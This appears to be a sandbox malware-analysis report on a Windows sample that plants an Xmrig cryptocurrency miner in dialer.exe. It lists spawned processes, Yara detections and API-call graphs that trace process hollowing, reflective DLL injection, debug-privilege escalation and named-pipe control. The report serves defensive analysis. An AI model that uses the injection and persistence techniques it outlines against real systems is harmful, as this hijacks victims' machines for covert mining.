                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                                          File size:55'320 bytes
                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:51
                                                                                                                          Start time:17:26:01
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                                          File size:55'320 bytes
                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:52
                                                                                                                          Start time:17:26:01
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\dialer.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\dialer.exe
                                                                                                                          Imagebase:0x7ff674890000
                                                                                                                          File size:39'936 bytes
                                                                                                                          MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000003.2193166407.000001888CD4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000002.3320602236.000001888CCD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000002.3320602236.000001888CCB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000003.2193071885.000001888D285000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000003.2193071885.000001888D28F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000002.3320602236.000001888CD3F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000002.3320602236.000001888CD31000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Has exited:false

                                                                                                                          Target ID:53
                                                                                                                          Start time:17:26:02
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                                          File size:55'320 bytes
                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:54
                                                                                                                          Start time:17:26:03
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                                          File size:55'320 bytes
                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:55
                                                                                                                          Start time:17:26:03
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                                          File size:55'320 bytes
                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Reset < >
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2134368926.00007FF727271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF727270000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2134346135.00007FF727270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2134388113.00007FF727276000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2134422766.00007FF72729E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2134932581.00007FF72780F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2134954654.00007FF727812000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2134977303.00007FF727816000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2135002394.00007FF72781B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2135021736.00007FF72781C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ff727270000_hiwA7Blv7C.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7c2445de3022a9d17434f7f8fda6e2b2b0e499a135514e3e3fd989fa08777e8a
                                                                                                                            • Instruction ID: 76c2a588224a8ea8bba164740e4a8414cccb2f3b3252bea1f856f126adda8925
                                                                                                                            • Opcode Fuzzy Hash: 7c2445de3022a9d17434f7f8fda6e2b2b0e499a135514e3e3fd989fa08777e8a
                                                                                                                            • Instruction Fuzzy Hash: 4FB09260A0420184EA013F419E412586660AB86700F822420C40C0A356CA6C50524B30

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:45.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:67%
                                                                                                                            Total number of Nodes:227
                                                                                                                            Total number of Limit Nodes:25
                                                                                                                            execution_graph 522 7ff68d3d2524 523 7ff68d3d2531 522->523 524 7ff68d3d2539 522->524 525 7ff68d3d10c0 30 API calls 523->525 525->524 383 7ff68d3d21d0 385 7ff68d3d21dd 383->385 386 7ff68d3d21f2 Sleep 385->386 387 7ff68d3d21fd ConnectNamedPipe 385->387 392 7ff68d3d1b54 AllocateAndInitializeSid 385->392 386->385 388 7ff68d3d2241 Sleep 387->388 389 7ff68d3d220c ReadFile 387->389 391 7ff68d3d224c DisconnectNamedPipe 388->391 390 7ff68d3d222f 389->390 389->391 390->391 391->387 393 7ff68d3d1c6f 392->393 394 7ff68d3d1bb1 SetEntriesInAclW 392->394 393->385 394->393 395 7ff68d3d1bf5 LocalAlloc 394->395 395->393 396 7ff68d3d1c09 InitializeSecurityDescriptor 395->396 396->393 397 7ff68d3d1c19 SetSecurityDescriptorDacl 396->397 397->393 398 7ff68d3d1c30 CreateNamedPipeW 397->398 398->393 526 7ff68d3d2560 527 7ff68d3d2592 526->527 528 7ff68d3d273a 526->528 531 7ff68d3d26c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->531 532 7ff68d3d2598 527->532 529 7ff68d3d297e ReadFile 528->529 530 7ff68d3d2748 528->530 535 7ff68d3d29a8 529->535 586 7ff68d3d2633 529->586 533 7ff68d3d2974 530->533 534 7ff68d3d2751 530->534 536 7ff68d3d2704 531->536 531->586 537 7ff68d3d25a5 532->537 538 7ff68d3d26bd ExitProcess 532->538 539 7ff68d3d175c 22 API calls 533->539 540 7ff68d3d275c 534->540 541 7ff68d3d2919 534->541 546 7ff68d3d18ac 3 API calls 535->546 535->586 548 7ff68d3d10c0 30 API calls 536->548 536->586 542 7ff68d3d25ae 537->542 543 7ff68d3d2660 RegOpenKeyExW 537->543 539->586 544 7ff68d3d2761 540->544 545 7ff68d3d279d 540->545 547 7ff68d3d1944 ReadFile 541->547 555 7ff68d3d25cb ReadFile 542->555 542->586 549 7ff68d3d26a1 543->549 550 7ff68d3d268d RegDeleteValueW 543->550 544->586 608 7ff68d3d217c 544->608 611 7ff68d3d1944 545->611 552 7ff68d3d29c7 546->552 554 7ff68d3d2928 547->554 548->536 595 7ff68d3d19c4 SysAllocString SysAllocString CoInitializeEx 549->595 550->549 562 7ff68d3d29db GetProcessHeap HeapAlloc 552->562 585 7ff68d3d2638 552->585 552->586 564 7ff68d3d1944 ReadFile 554->564 554->586 559 7ff68d3d25f5 555->559 555->586 556 7ff68d3d26a6 603 7ff68d3d175c GetProcessHeap HeapAlloc 556->603 571 7ff68d3d18ac 3 API calls 559->571 559->586 568 7ff68d3d14d8 13 API calls 562->568 563 7ff68d3d27b4 ReadFile 569 7ff68d3d27dc 563->569 563->586 565 7ff68d3d293f 564->565 570 7ff68d3d2947 ShellExecuteW 565->570 565->586 583 7ff68d3d2a14 568->583 575 7ff68d3d27e9 GetProcessHeap HeapAlloc ReadFile 569->575 569->586 570->586 578 7ff68d3d2614 571->578 574 7ff68d3d2a90 4 API calls 574->586 576 7ff68d3d290b GetProcessHeap 575->576 577 7ff68d3d282d 575->577 581 7ff68d3d2a52 HeapFree 576->581 577->576 587 7ff68d3d285e 577->587 588 7ff68d3d2881 lstrlenW GetProcessHeap HeapAlloc 577->588 584 7ff68d3d2624 578->584 578->585 578->586 580 7ff68d3d2a49 GetProcessHeap 580->581 581->586 583->580 635 7ff68d3d16cc 583->635 589 7ff68d3d10c0 30 API calls 584->589 585->574 587->576 615 7ff68d3d1c88 587->615 629 7ff68d3d2a90 CreateFileW 588->629 589->586 596 7ff68d3d1a11 CoInitializeSecurity 595->596 597 7ff68d3d1b2c SysFreeString SysFreeString 595->597 598 7ff68d3d1a4d 596->598 599 7ff68d3d1a59 CoCreateInstance 596->599 597->556 598->599 600 7ff68d3d1b26 CoUninitialize 598->600 599->600 601 7ff68d3d1a88 VariantInit 599->601 600->597 602 7ff68d3d1ade 601->602 602->600 604 7ff68d3d14d8 13 API calls 603->604 606 7ff68d3d179a 604->606 605 7ff68d3d17c8 GetProcessHeap HeapFree 606->605 607 7ff68d3d16cc 5 API calls 606->607 607->606 609 7ff68d3d1914 2 API calls 608->609 610 7ff68d3d2191 609->610 612 7ff68d3d1968 ReadFile 611->612 613 7ff68d3d198b 612->613 614 7ff68d3d19a5 612->614 613->612 613->614 614->563 614->586 616 7ff68d3d1cbb 615->616 617 7ff68d3d1cce CreateProcessW 616->617 620 7ff68d3d1e97 616->620 621 7ff68d3d1e62 OpenProcess 616->621 623 7ff68d3d1dd2 VirtualAlloc 616->623 624 7ff68d3d1d8c WriteProcessMemory 616->624 617->616 618 7ff68d3d1d2b VirtualAllocEx 617->618 618->616 619 7ff68d3d1d60 WriteProcessMemory 618->619 619->616 620->576 621->616 622 7ff68d3d1e78 TerminateProcess 621->622 622->616 623->616 625 7ff68d3d1df1 GetThreadContext 623->625 624->616 625->616 626 7ff68d3d1e09 WriteProcessMemory 625->626 626->616 627 7ff68d3d1e30 SetThreadContext 626->627 627->616 628 7ff68d3d1e4e ResumeThread 627->628 628->616 628->620 630 7ff68d3d28f7 GetProcessHeap HeapFree 629->630 631 7ff68d3d2ada WriteFile 629->631 630->576 632 7ff68d3d2afe 631->632 633 7ff68d3d2b1c CloseHandle 631->633 632->633 634 7ff68d3d2b02 WriteFile 632->634 633->630 634->633 636 7ff68d3d1745 635->636 637 7ff68d3d16eb OpenProcess 635->637 636->580 637->636 638 7ff68d3d1703 637->638 639 7ff68d3d211c 2 API calls 638->639 640 7ff68d3d1723 639->640 641 7ff68d3d173c CloseHandle 640->641 642 7ff68d3d1731 CloseHandle 640->642 641->636 642->641 399 7ff68d3d2b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 400 7ff68d3d2b8e K32EnumProcesses 399->400 401 7ff68d3d2ba3 400->401 402 7ff68d3d2beb Sleep 400->402 403 7ff68d3d2bdc 401->403 405 7ff68d3d2540 401->405 402->400 403->402 406 7ff68d3d254d 405->406 407 7ff68d3d2558 405->407 409 7ff68d3d10c0 406->409 407->401 447 7ff68d3d18ac OpenProcess 409->447 412 7ff68d3d14ba 412->407 413 7ff68d3d1122 OpenProcess 413->412 414 7ff68d3d113e OpenProcess 413->414 415 7ff68d3d1161 K32GetModuleFileNameExW 414->415 416 7ff68d3d11fd NtQueryInformationProcess 414->416 417 7ff68d3d11aa CloseHandle 415->417 418 7ff68d3d117a PathFindFileNameW lstrlenW 415->418 419 7ff68d3d1224 416->419 420 7ff68d3d14b1 CloseHandle 416->420 417->416 422 7ff68d3d11b8 417->422 418->417 421 7ff68d3d1197 StrCpyW 418->421 419->420 423 7ff68d3d1230 OpenProcessToken 419->423 420->412 421->417 422->416 424 7ff68d3d11d8 StrCmpIW 422->424 423->420 425 7ff68d3d124e GetTokenInformation 423->425 424->420 424->422 426 7ff68d3d12f1 425->426 427 7ff68d3d1276 GetLastError 425->427 429 7ff68d3d12f8 CloseHandle 426->429 427->426 428 7ff68d3d1281 LocalAlloc 427->428 428->426 430 7ff68d3d1297 GetTokenInformation 428->430 429->420 434 7ff68d3d130c 429->434 431 7ff68d3d12df 430->431 432 7ff68d3d12bf GetSidSubAuthorityCount GetSidSubAuthority 430->432 433 7ff68d3d12e6 LocalFree 431->433 432->433 433->429 434->420 435 7ff68d3d139b StrStrA 434->435 436 7ff68d3d13c3 434->436 435->434 437 7ff68d3d13c8 435->437 436->420 437->420 438 7ff68d3d13f3 VirtualAllocEx 437->438 438->420 439 7ff68d3d1420 WriteProcessMemory 438->439 439->420 440 7ff68d3d143b 439->440 452 7ff68d3d211c 440->452 442 7ff68d3d145b 442->420 443 7ff68d3d1478 WaitForSingleObject 442->443 446 7ff68d3d1471 CloseHandle 442->446 445 7ff68d3d1487 GetExitCodeThread 443->445 443->446 445->446 446->420 448 7ff68d3d110e 447->448 449 7ff68d3d18d8 IsWow64Process 447->449 448->412 448->413 450 7ff68d3d18ea 449->450 451 7ff68d3d18f8 CloseHandle 449->451 450->451 451->448 455 7ff68d3d1914 GetModuleHandleA 452->455 456 7ff68d3d1934 GetProcAddress 455->456 457 7ff68d3d193d 455->457 456->457 458 7ff68d3d2258 461 7ff68d3d226c 458->461 485 7ff68d3d1f2c 461->485 464 7ff68d3d1f2c 14 API calls 465 7ff68d3d228f GetCurrentProcessId OpenProcess 464->465 466 7ff68d3d22af OpenProcessToken 465->466 467 7ff68d3d2321 FindResourceExA 465->467 468 7ff68d3d22c3 LookupPrivilegeValueW 466->468 469 7ff68d3d2318 CloseHandle 466->469 470 7ff68d3d2341 SizeofResource 467->470 471 7ff68d3d2261 ExitProcess 467->471 468->469 472 7ff68d3d22da AdjustTokenPrivileges 468->472 469->467 470->471 473 7ff68d3d235a LoadResource 470->473 472->469 474 7ff68d3d2312 GetLastError 472->474 473->471 475 7ff68d3d236e LockResource GetCurrentProcessId 473->475 474->469 499 7ff68d3d17ec GetProcessHeap HeapAlloc 475->499 477 7ff68d3d238b RegCreateKeyExW 478 7ff68d3d23cc ConvertStringSecurityDescriptorToSecurityDescriptorW 477->478 479 7ff68d3d2489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 477->479 480 7ff68d3d23f4 RegSetKeySecurity LocalFree 478->480 481 7ff68d3d240e RegCreateKeyExW 478->481 482 7ff68d3d250f SleepEx 479->482 480->481 483 7ff68d3d247f RegCloseKey 481->483 484 7ff68d3d2448 GetCurrentProcessId RegSetValueExW RegCloseKey 481->484 482->482 483->479 484->483 486 7ff68d3d1f35 StrCpyW StrCatW GetModuleHandleW 485->486 487 7ff68d3d20ff 485->487 486->487 488 7ff68d3d1f86 GetCurrentProcess K32GetModuleInformation 486->488 487->464 489 7ff68d3d20f6 FreeLibrary 488->489 490 7ff68d3d1fb6 CreateFileW 488->490 489->487 490->489 491 7ff68d3d1feb CreateFileMappingW 490->491 492 7ff68d3d2014 MapViewOfFile 491->492 493 7ff68d3d20ed CloseHandle 491->493 494 7ff68d3d20e4 CloseHandle 492->494 495 7ff68d3d2037 492->495 493->489 494->493 495->494 496 7ff68d3d2050 lstrcmpiA 495->496 498 7ff68d3d208e 495->498 496->495 497 7ff68d3d2090 VirtualProtect VirtualProtect 496->497 497->494 498->494 505 7ff68d3d14d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 499->505 501 7ff68d3d1885 GetProcessHeap HeapFree 502 7ff68d3d1830 502->501 503 7ff68d3d1851 OpenProcess 502->503 503->502 504 7ff68d3d1867 TerminateProcess CloseHandle 503->504 504->502 506 7ff68d3d1565 505->506 507 7ff68d3d162f GetProcessHeap HeapFree GetProcessHeap HeapFree 505->507 506->507 508 7ff68d3d157a OpenProcess 506->508 510 7ff68d3d161a CloseHandle 506->510 511 7ff68d3d15c9 ReadProcessMemory 506->511 507->502 508->506 509 7ff68d3d1597 K32EnumProcessModules 508->509 509->506 509->510 510->506 511->506 512 7ff68d3d2bf8 513 7ff68d3d2c05 512->513 514 7ff68d3d1b54 6 API calls 513->514 515 7ff68d3d2c25 ConnectNamedPipe 513->515 516 7ff68d3d2c1a Sleep 513->516 514->513 517 7ff68d3d2c83 Sleep 515->517 518 7ff68d3d2c34 ReadFile 515->518 516->513 519 7ff68d3d2c8e DisconnectNamedPipe 517->519 518->519 520 7ff68d3d2c57 WriteFile 518->520 519->515 520->519

                                                                                                                            Callgraph

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                                                                            • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                                                            • API String ID: 4177739653-1130149537
                                                                                                                            • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                                                            • Instruction ID: 53c4c4cf0299758a368adaabfc6705dece2aa82ca9d036277f2f0ece36f0eecf
                                                                                                                            • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                                                            • Instruction Fuzzy Hash: CD812A76A08B42D7F7209F61E8445ADB3A1FF8A758B444139D94EC2A64EF3CD54CCB20

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 24 7ff68d3d10c0-7ff68d3d1110 call 7ff68d3d18ac 27 7ff68d3d14ba-7ff68d3d14d6 24->27 28 7ff68d3d1116-7ff68d3d111c 24->28 28->27 29 7ff68d3d1122-7ff68d3d1138 OpenProcess 28->29 29->27 30 7ff68d3d113e-7ff68d3d115b OpenProcess 29->30 31 7ff68d3d1161-7ff68d3d1178 K32GetModuleFileNameExW 30->31 32 7ff68d3d11fd-7ff68d3d121e NtQueryInformationProcess 30->32 33 7ff68d3d11aa-7ff68d3d11b6 CloseHandle 31->33 34 7ff68d3d117a-7ff68d3d1195 PathFindFileNameW lstrlenW 31->34 35 7ff68d3d1224-7ff68d3d122a 32->35 36 7ff68d3d14b1-7ff68d3d14b4 CloseHandle 32->36 33->32 38 7ff68d3d11b8-7ff68d3d11d3 33->38 34->33 37 7ff68d3d1197-7ff68d3d11a7 StrCpyW 34->37 35->36 39 7ff68d3d1230-7ff68d3d1248 OpenProcessToken 35->39 36->27 37->33 40 7ff68d3d11d8-7ff68d3d11ea StrCmpIW 38->40 39->36 41 7ff68d3d124e-7ff68d3d1274 GetTokenInformation 39->41 40->36 42 7ff68d3d11f0-7ff68d3d11fb 40->42 43 7ff68d3d12f1 41->43 44 7ff68d3d1276-7ff68d3d127f GetLastError 41->44 42->32 42->40 46 7ff68d3d12f8-7ff68d3d1306 CloseHandle 43->46 44->43 45 7ff68d3d1281-7ff68d3d1295 LocalAlloc 44->45 45->43 47 7ff68d3d1297-7ff68d3d12bd GetTokenInformation 45->47 46->36 48 7ff68d3d130c-7ff68d3d1313 46->48 49 7ff68d3d12df 47->49 50 7ff68d3d12bf-7ff68d3d12dd GetSidSubAuthorityCount GetSidSubAuthority 47->50 48->36 51 7ff68d3d1319-7ff68d3d1324 48->51 52 7ff68d3d12e6-7ff68d3d12ef LocalFree 49->52 50->52 51->36 53 7ff68d3d132a-7ff68d3d1334 51->53 52->46 53->36 54 7ff68d3d133a-7ff68d3d1344 53->54 54->36 55 7ff68d3d134a-7ff68d3d138a call 7ff68d3d1ec4 * 3 54->55 55->36 62 7ff68d3d1390-7ff68d3d13b0 call 7ff68d3d1ec4 StrStrA 55->62 65 7ff68d3d13b2-7ff68d3d13c1 62->65 66 7ff68d3d13c8-7ff68d3d13ed call 7ff68d3d1ec4 * 2 62->66 65->62 67 7ff68d3d13c3 65->67 66->36 72 7ff68d3d13f3-7ff68d3d141a VirtualAllocEx 66->72 67->36 72->36 73 7ff68d3d1420-7ff68d3d1439 WriteProcessMemory 72->73 73->36 74 7ff68d3d143b-7ff68d3d145d call 7ff68d3d211c 73->74 74->36 77 7ff68d3d145f-7ff68d3d1467 74->77 77->36 78 7ff68d3d1469-7ff68d3d146f 77->78 79 7ff68d3d1471-7ff68d3d1476 78->79 80 7ff68d3d1478-7ff68d3d1485 WaitForSingleObject 78->80 81 7ff68d3d14ab CloseHandle 79->81 82 7ff68d3d14a6 80->82 83 7ff68d3d1487-7ff68d3d149b GetExitCodeThread 80->83 81->36 82->81 83->82 84 7ff68d3d149d-7ff68d3d14a3 83->84 84->82
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                                                                            • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                                                                            • API String ID: 2561231171-3753927220
                                                                                                                            • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                                                            • Instruction ID: 95896fddcf483bc998bfb257314743c1accfe3dc39718b01957172e1c5c41f5b
                                                                                                                            • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                                                            • Instruction Fuzzy Hash: C2B13F61A08643C7EB26DF11E844679A7A5FF46B84F044139DA0EC7798EF3CE949CB60

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4084875642-0
                                                                                                                            • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                                                            • Instruction ID: 3342f0b7c01278d299382eba71afc5471610c449841624e860445afbed033a4c
                                                                                                                            • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                                                            • Instruction Fuzzy Hash: 19519E32B15682CBFB619F62A8546A9A3A1FF4AB84F444038DE4DC7758EF3CD549CA10

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3197395349-0
                                                                                                                            • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                                                            • Instruction ID: 51b439a764ac23896e26a5a02ce31449a29bfeea5244df1c484b0e0030158c6c
                                                                                                                            • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                                                            • Instruction Fuzzy Hash: 49317172614651CBE720CF24E48079EB7A5FB49798F40422AEB4D87E98EF38D108CF50

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3676546796-0
                                                                                                                            • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                                                            • Instruction ID: 22bd6dcec7909e6d6ecbeb0e0a9d70ae4d9a50126778e9495d5d4393abc7a756
